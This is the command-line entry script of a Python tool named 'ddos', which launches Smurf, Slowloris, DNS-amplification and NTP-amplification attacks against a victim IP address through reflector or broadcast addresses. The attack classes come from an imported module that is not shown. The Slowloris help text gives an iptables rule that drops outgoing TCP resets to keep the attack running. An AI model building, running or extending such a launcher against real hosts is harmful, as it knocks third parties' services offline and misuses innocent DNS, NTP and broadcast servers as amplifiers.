from attacks import Smurf, Slowloris, Dns, Ntp
from argparse import ArgumentParser

def handle_smurf(victim_ip: str, broadcast_ip: str, func=None):
    Smurf(victim_ip, broadcast_ip).run()

def handle_slowloris(victim_ip: str, victim_port: int, start_port: int, requests: int, func=None):
    Slowloris(victim_ip, victim_port, start_port, requests).run()

def handle_dns(victim_ip: str, dns_server: str, domain: str, func=None):
    Dns(victim_ip, dns_server, domain).run()

def handle_ntp(victim_ip: str, ntp_server: str, start_port: int, requests: int, func=None):
    Ntp(victim_ip, ntp_server, start_port, requests).run()

def main():
    parser = ArgumentParser("ddos")
    subparsers = parser.add_subparsers(title="attack type")

    smurf_parser = subparsers.add_parser("smurf", aliases=["s"])
    smurf_parser.add_argument("--victim-ip", "-v", action="store", type=str, required=True)
    smurf_parser.add_argument("--broadcast-ip", "-b", action="store", type=str, required=True)
    smurf_parser.set_defaults(func=handle_smurf)

    slowloris_parser = subparsers.add_parser("slowloris", aliases=["sl"], epilog="RST packages must be blocked beforehand by executing sudo iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP")
    slowloris_parser.add_argument("--victim-ip", "-v", action="store", type=str, required=True)
    slowloris_parser.add_argument("--victim-port", "-p", action="store", type=int, required=True)
    slowloris_parser.add_argument("--start-port", "-x", action="store", type=int, required=True)
    slowloris_parser.add_argument("--requests", "-r", action="store", type=int, required=True)
    slowloris_parser.set_defaults(func=handle_slowloris)

    dns_parser = subparsers.add_parser("dns", aliases="d")
    dns_parser.add_argument("--victim-ip", "-v", action="store", type=str, required=True)
    dns_parser.add_argument("--dns-server", "-s", action="store", type=str, required=True)
    dns_parser.add_argument("--domain", "-d", action="store", type=str, required=True)
    dns_parser.set_defaults(func=handle_dns)

    ntp_parser = subparsers.add_parser("ntp", aliases=["n"])
    ntp_parser.add_argument("--victim-ip", "-v", action="store", type=str, required=True)
    ntp_parser.add_argument("--ntp-server", "-s", action="store", type=str, required=True)
    ntp_parser.add_argument("--start-port", "-x", action="store", type=int, required=True)
    ntp_parser.add_argument("--requests", "-r", action="store", type=int, required=True)
    ntp_parser.set_defaults(func=handle_ntp)

    parsed_args = parser.parse_args()
    args = vars(parsed_args)
    parsed_args.func(**args)

if __name__ == "__main__":
    main()
